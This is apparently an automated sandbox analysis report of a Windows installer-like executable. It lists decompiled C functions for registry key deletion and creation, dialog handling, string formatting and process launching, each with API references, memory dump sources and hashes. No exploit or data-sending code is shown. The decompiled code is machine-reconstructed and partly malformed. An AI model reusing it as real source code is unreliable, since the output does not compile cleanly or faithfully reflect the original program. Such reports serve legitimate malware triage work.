                                                                                                                        Function 00402A36, Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 84%
                                                                                                                        			E00402A36(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x423f50 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E00402A36(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405E88(2);
					if(_t27 == 0) {
						if( *0x423f50 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x423f50, 0);
				}
				return _t18;
			}








                                                                                                                        0x00402a57
                                                                                                                        0x00402a5f
                                                                                                                        0x00402a87
                                                                                                                        0x00402a71
                                                                                                                        0x00402ac1
                                                                                                                        0x00402ac7
                                                                                                                        0x00000000
                                                                                                                        0x00402ac9
                                                                                                                        0x00402a85
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00402a85
                                                                                                                        0x00402a9c
                                                                                                                        0x00402aa4
                                                                                                                        0x00402aab
                                                                                                                        0x00402ad7
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00402adf
                                                                                                                        0x00402ae7
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00402ae7
                                                                                                                        0x00000000
                                                                                                                        0x00402aba
                                                                                                                        0x00402ace

                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A57
                                                                                                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A93
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00402A9C
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00402AC1
                                                                                                                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402ADF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$DeleteEnumOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1912718029-0
                                                                                                                        • Opcode ID: 90165163457562f2d2db0d0e016cf4740f9c141c2854e05e69f214c53397e3bf
                                                                                                                        • Instruction ID: 3ec7b1818cbfc33efeafaf7017db19c7c479205e5d6f4ff66fb244667a93d6f3
                                                                                                                        • Opcode Fuzzy Hash: 90165163457562f2d2db0d0e016cf4740f9c141c2854e05e69f214c53397e3bf
                                                                                                                        • Instruction Fuzzy Hash: 93112971A00009FFDF319F90DE49EAF7B7DEB44385B104436F905A10A0DBB59E51AE69
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00401CC1, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00401CC1(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
				GetClientRect(_t25, _t27 - 0x40);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029F6(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                                                                                                        0x00401ccb
                                                                                                                        0x00401cd2
                                                                                                                        0x00401d01
                                                                                                                        0x00401d09
                                                                                                                        0x00401d10
                                                                                                                        0x00401d10
                                                                                                                        0x0040288e
                                                                                                                        0x0040289a

                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32 ref: 00401CC5
                                                                                                                        • GetClientRect.USER32 ref: 00401CD2
                                                                                                                        • LoadImageA.USER32 ref: 00401CF3
                                                                                                                        • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00401D10
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1849352358-0
                                                                                                                        • Opcode ID: c0b5d6f5fd98bc6365335fa1ca8c03edfb6534782bc97ff6e07cc3447251dcb0
                                                                                                                        • Instruction ID: de7316f9b9f1bcc3f0c1dff9ae5dc63c91f1472c52c052d8cf8a0da7f27950be
                                                                                                                        • Opcode Fuzzy Hash: c0b5d6f5fd98bc6365335fa1ca8c03edfb6534782bc97ff6e07cc3447251dcb0
                                                                                                                        • Instruction Fuzzy Hash: D5F01DB2E04105BFD700EFA4EE89DAFB7BDEB44345B104576F602F2190C6789D018B69
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004046F1, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 40%
                                                                                                                        			E004046F1(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t33;
				signed int _t35;
				signed int _t38;
				unsigned int _t45;

				_t45 = _a12;
				_push(0x14);
				_pop(0);
				_t33 = 0xffffffdc;
				if(_t45 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t33 = 0xffffffdd;
				}
				if(_t45 < 0x400) {
					_t33 = 0xffffffde;
				}
				if(_t45 < 0xffff3333) {
					_t38 = 0x14;
					asm("cdq");
					_t45 = _t45 + 1 / _t38;
				}
				_push(E00405B88(_t33, 0, _t45,  &_v36, 0xffffffdf));
				_push(E00405B88(_t33, 0, _t45,  &_v68, _t33));
				_t21 = _t45 & 0x00ffffff;
				_t35 = 0xa;
				_push(((_t45 & 0x00ffffff) + _t21 * 4 + (_t45 & 0x00ffffff) + _t21 * 4 >> 0) % _t35);
				_push(_t45 >> 0);
				_push("%u.%u%s%s");
				_t26 = E00405B88(_t33, 0, 0x4204a0, 0x4204a0, _a8);
				_push(0x4204a0);
				L00405B7C();
				wsprintfA(_t26 + _t26);
				return SetDlgItemTextA( *0x423678, _a4, 0x4204a0);
			}













                                                                                                                        0x004046f9
                                                                                                                        0x004046fd
                                                                                                                        0x00404705
                                                                                                                        0x00404708
                                                                                                                        0x00404709
                                                                                                                        0x0040470b
                                                                                                                        0x0040470d
                                                                                                                        0x00404710
                                                                                                                        0x00404710
                                                                                                                        0x00404717
                                                                                                                        0x0040471d
                                                                                                                        0x0040471d
                                                                                                                        0x00404724
                                                                                                                        0x0040472f
                                                                                                                        0x00404730
                                                                                                                        0x00404733
                                                                                                                        0x00404733
                                                                                                                        0x00404740
                                                                                                                        0x0040474b
                                                                                                                        0x0040474e
                                                                                                                        0x00404760
                                                                                                                        0x00404767
                                                                                                                        0x00404768
                                                                                                                        0x00404769
                                                                                                                        0x00404777
                                                                                                                        0x0040477c
                                                                                                                        0x0040477f
                                                                                                                        0x00404787
                                                                                                                        0x004047a3

                                                                                                                        APIs
                                                                                                                        • lstrlen.KERNEL32(004204A0,004204A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404611,000000DF,0000040F,00000400,00000000), ref: 0040477F
                                                                                                                        • wsprintfA.USER32 ref: 00404787
                                                                                                                        • SetDlgItemTextA.USER32 ref: 0040479A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                                                                        • String ID: %u.%u%s%s
                                                                                                                        • API String ID: 3540041739-3551169577
                                                                                                                        • Opcode ID: c1bf9231fe92aebf28e2bf8449a75e77e369f05ec6904c2f29ee4e7a53275fee
                                                                                                                        • Instruction ID: e1128f73888b2767c9277aed1687fd20c93e739cc52df1aac9c0a45a5a8dde9d
                                                                                                                        • Opcode Fuzzy Hash: c1bf9231fe92aebf28e2bf8449a75e77e369f05ec6904c2f29ee4e7a53275fee
                                                                                                                        • Instruction Fuzzy Hash: 7311E2736001243BDB10666D9C46EEF3699DBC6335F14423BFA25F61D1E938AC5286A8
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00401BAD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 51%
                                                                                                                        			E00401BAD() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 0x34) = E004029D9(3);
				 *(_t55 + 8) = E004029D9(4);
				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x34)) = E004029F6(0x33);
				}
				__eflags =  *(_t55 - 0x10) & 0x00000002;
				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
					 *(_t55 + 8) = E004029F6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E004029F6();
					_t28 = E004029F6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E004029D9();
					_t37 = E004029D9();
					_t48 =  *(_t55 - 0x10) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
						L10:
						 *(_t55 - 8) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
					_push( *(_t55 - 8));
					E00405AC4();
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                                                                                                                        0x00401bb6
                                                                                                                        0x00401bc2
                                                                                                                        0x00401bc5
                                                                                                                        0x00401bce
                                                                                                                        0x00401bce
                                                                                                                        0x00401bd1
                                                                                                                        0x00401bd5
                                                                                                                        0x00401bde
                                                                                                                        0x00401bde
                                                                                                                        0x00401be1
                                                                                                                        0x00401be5
                                                                                                                        0x00401be7
                                                                                                                        0x00401c34
                                                                                                                        0x00401c36
                                                                                                                        0x00401c3f
                                                                                                                        0x00401c47
                                                                                                                        0x00401c4a
                                                                                                                        0x00401c4a
                                                                                                                        0x00401c53
                                                                                                                        0x00000000
                                                                                                                        0x00401be9
                                                                                                                        0x00401bf0
                                                                                                                        0x00401bf2
                                                                                                                        0x00401bfa
                                                                                                                        0x00401bfd
                                                                                                                        0x00401c25
                                                                                                                        0x00401c59
                                                                                                                        0x00401c59
                                                                                                                        0x00401bff
                                                                                                                        0x00401c0d
                                                                                                                        0x00401c15
                                                                                                                        0x00401c18
                                                                                                                        0x00401c18
                                                                                                                        0x00401bfd
                                                                                                                        0x00401c5c
                                                                                                                        0x00401c5f
                                                                                                                        0x00401c65
                                                                                                                        0x00402833
                                                                                                                        0x00402833
                                                                                                                        0x0040288e
                                                                                                                        0x0040289a

                                                                                                                        APIs
                                                                                                                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                                                                                                                        • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Timeout
                                                                                                                        • String ID: !
                                                                                                                        • API String ID: 1777923405-2657877971
                                                                                                                        • Opcode ID: 4c88f05d798f5705ce1e1e18451d2fcf653d7f56610e9d44bad61831beeb824c
                                                                                                                        • Instruction ID: 67abd366a37910a3fb0c7fe19d632a25016d3899897cc5a5bd850e91adcb6683
                                                                                                                        • Opcode Fuzzy Hash: 4c88f05d798f5705ce1e1e18451d2fcf653d7f56610e9d44bad61831beeb824c
                                                                                                                        • Instruction Fuzzy Hash: B721C4B1A44209BFEF01AFB4CE4AAAE7B75EF44344F14053EF602B60D1D6B84980E718
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004053C6, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24processCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E004053C6(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x4224a8->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x4224a8,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                                                                        0x004053cf
                                                                                                                        0x004053eb
                                                                                                                        0x004053f3
                                                                                                                        0x004053f8
                                                                                                                        0x00000000
                                                                                                                        0x004053fe
                                                                                                                        0x00405402

                                                                                                                        APIs
                                                                                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004224A8,Error launching installer), ref: 004053EB
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 004053F8
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004053C6
                                                                                                                        • Error launching installer, xrefs: 004053D9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCreateHandleProcess
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                                                                                                                        • API String ID: 3712363035-4043152584
                                                                                                                        • Opcode ID: 3b814a6f076d0ba9038e170a1e0f3647fdefee354992cb10a65e7e77ca0a2381
                                                                                                                        • Instruction ID: 069b69ca15cd8b990da55ccc95fe3be7356009797bdfa18ab8f6d6c8c96e71ef
                                                                                                                        • Opcode Fuzzy Hash: 3b814a6f076d0ba9038e170a1e0f3647fdefee354992cb10a65e7e77ca0a2381
                                                                                                                        • Instruction Fuzzy Hash: A3E0ECB4A00219BFDB00AF64ED49AAB7BBDEB00305F90C522A911E2150D775D8118AB9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00405659, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 53%
                                                                                                                        			E00405659(void* __eax, char* _a4) {
				char* _t6;

				_t6 = _a4;
				_push(_t6);
				L00405B7C();
				if( *(CharPrevA(_t6, __eax + _t6)) != 0x5c) {
					_push(0x409010);
					_push(_t6);
					L00405B82();
				}
				return _t6;
			}




                                                                                                                        0x0040565a
                                                                                                                        0x0040565e
                                                                                                                        0x0040565f
                                                                                                                        0x00405671
                                                                                                                        0x00405673
                                                                                                                        0x00405678
                                                                                                                        0x00405679
                                                                                                                        0x00405679
                                                                                                                        0x00405681

                                                                                                                        APIs
                                                                                                                        • lstrlen.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403226,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 0040565F
                                                                                                                        • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403226,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405668
                                                                                                                        • lstrcat.KERNEL32(?,00409010), ref: 00405679
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405659
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CharPrevlstrcatlstrlen
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                        • API String ID: 2659869361-3936084776
                                                                                                                        • Opcode ID: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                                                                                                        • Instruction ID: d5422d5486d5b384c4dcc02911800b35c31fcf4388d9dde419d5dff5703c7688
                                                                                                                        • Opcode Fuzzy Hash: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                                                                                                        • Instruction Fuzzy Hash: 8BD05272605A202ED2022A258C05E9B7A28CF06311B044866B540B2292C6386D818AEE
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00402303, Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 85%
                                                                                                                        			E00402303(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				void* _t25;
				int _t26;
				intOrPtr _t34;
				void* _t36;

				_t15 = E00402AEB(__eax);
				_t34 =  *((intOrPtr*)(_t36 - 0x14));
				 *(_t36 - 0x30) =  *(_t36 - 0x10);
				 *(_t36 - 0x44) = E004029F6(2);
				_t18 = E004029F6(0x11);
				_t30 =  *0x423f50 | 0x00000002;
				 *(_t36 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t26, _t26, _t26,  *0x423f50 | 0x00000002, _t26, _t36 + 8, _t26);
				if(_t19 == 0) {
					if(_t34 == 1) {
						_t25 = E004029F6(0x23);
						_push(0x40a370);
						L00405B7C();
						_t19 = _t25 + 1;
					}
					if(_t34 == 4) {
						_t24 = E004029D9(3);
						 *0x40a370 = _t24;
						_t19 = _t34;
					}
					if(_t34 == 3) {
						_t19 = E00402F18(_t30,  *((intOrPtr*)(_t36 - 0x18)), _t26, 0x40a370, 0xc00);
					}
					if(RegSetValueExA( *(_t36 + 8),  *(_t36 - 0x44), _t26,  *(_t36 - 0x30), 0x40a370, _t19) == 0) {
						 *(_t36 - 4) = _t26;
					}
					_push( *(_t36 + 8));
					RegCloseKey();
				}
				 *0x423f28 =  *0x423f28 +  *(_t36 - 4);
				return 0;
			}











                                                                                                                        0x00402304
                                                                                                                        0x00402309
                                                                                                                        0x00402313
                                                                                                                        0x0040231d
                                                                                                                        0x00402320
                                                                                                                        0x00402330
                                                                                                                        0x0040233a
                                                                                                                        0x00402341
                                                                                                                        0x00402349
                                                                                                                        0x00402357
                                                                                                                        0x0040235b
                                                                                                                        0x00402360
                                                                                                                        0x00402361
                                                                                                                        0x00402366
                                                                                                                        0x00402366
                                                                                                                        0x0040236a
                                                                                                                        0x0040236e
                                                                                                                        0x00402374
                                                                                                                        0x00402379
                                                                                                                        0x00402379
                                                                                                                        0x0040237d
                                                                                                                        0x00402389
                                                                                                                        0x00402389
                                                                                                                        0x004023a2
                                                                                                                        0x004023a4
                                                                                                                        0x004023a4
                                                                                                                        0x004023a7
                                                                                                                        0x0040247d
                                                                                                                        0x0040247d
                                                                                                                        0x0040288e
                                                                                                                        0x0040289a

                                                                                                                        APIs
                                                                                                                        • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402341
                                                                                                                        • lstrlen.KERNEL32(0040A370,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402361
                                                                                                                        • RegSetValueExA.ADVAPI32(?,?,?,?,0040A370,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040239A
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,0040A370,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040247D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCreateValuelstrlen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1356686001-0
                                                                                                                        • Opcode ID: c2905ab82e3d4f742e931df821d979397d372fc6ead50470bf6aaaad3d431b7f
                                                                                                                        • Instruction ID: d7b132d9018d44432a73f3315d2b91b6aa1600c7a927e9fa70905f900517fa5a
                                                                                                                        • Opcode Fuzzy Hash: c2905ab82e3d4f742e931df821d979397d372fc6ead50470bf6aaaad3d431b7f
                                                                                                                        • Instruction Fuzzy Hash: BA1160B1E00209BFEB10AFA0DE49EAF767CFB54398F10413AF905B61D0D7B85D019669
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00401EC5, Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 43%
                                                                                                                        			E00401EC5(char __ebx, char* __edi, char* __esi) {
				intOrPtr _t18;
				void* _t29;

				_t18 = E004029F6(0xffffffee);
				 *((intOrPtr*)(_t29 - 0x2c)) = _t18;
				_push(_t29 - 0x30);
				_push(_t18);
				L00406A54();
				 *__esi = __ebx;
				 *((intOrPtr*)(_t29 - 8)) = _t18;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t29 - 4)) = 1;
				if(_t18 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp + 8) = __eax;
					if(__eax != __ebx) {
						_push(__eax);
						_push( *((intOrPtr*)(__ebp - 8)));
						_push(__ebx);
						_push( *((intOrPtr*)(__ebp - 0x2c)));
						L00406A4E();
						if(__eax != 0) {
							__eax = __ebp - 0x44;
							_push(__ebp - 0x44);
							__eax = __ebp - 0x34;
							_push(__eax);
							_push(0x409010);
							_push( *(__ebp + 8));
							L00406A48();
							if(__eax != 0) {
								 *(__ebp - 0x34) = E00405AC4(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
								 *(__ebp - 0x34) = E00405AC4(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp + 8));
						GlobalFree();
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t29 - 4));
				return 0;
			}





                                                                                                                        0x00401ec7
                                                                                                                        0x00401ecf
                                                                                                                        0x00401ed2
                                                                                                                        0x00401ed3
                                                                                                                        0x00401ed4
                                                                                                                        0x00401ed9
                                                                                                                        0x00401edd
                                                                                                                        0x00401ee0
                                                                                                                        0x00401ee2
                                                                                                                        0x00401ee9
                                                                                                                        0x00401ef2
                                                                                                                        0x00401efa
                                                                                                                        0x00401efd
                                                                                                                        0x00401f03
                                                                                                                        0x00401f04
                                                                                                                        0x00401f07
                                                                                                                        0x00401f08
                                                                                                                        0x00401f0b
                                                                                                                        0x00401f12
                                                                                                                        0x00401f14
                                                                                                                        0x00401f17
                                                                                                                        0x00401f18
                                                                                                                        0x00401f1b
                                                                                                                        0x00401f1c
                                                                                                                        0x00401f21
                                                                                                                        0x00401f24
                                                                                                                        0x00401f2b
                                                                                                                        0x00401f34
                                                                                                                        0x00401f40
                                                                                                                        0x00401f45
                                                                                                                        0x00401f45
                                                                                                                        0x00401f2b
                                                                                                                        0x00401f48
                                                                                                                        0x00401b75
                                                                                                                        0x00401b75
                                                                                                                        0x00401efd
                                                                                                                        0x0040288e
                                                                                                                        0x0040289a

                                                                                                                        APIs
                                                                                                                        • 746814E0.VERSION(00000000,?,000000EE), ref: 00401ED4
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                                                                                                                        • 746814C0.VERSION(?,?,?,00000000), ref: 00401F0B
                                                                                                                        • 74681500.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401F24
                                                                                                                          • Part of subcall function 00405AC4: wsprintfA.USER32 ref: 00405AD1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
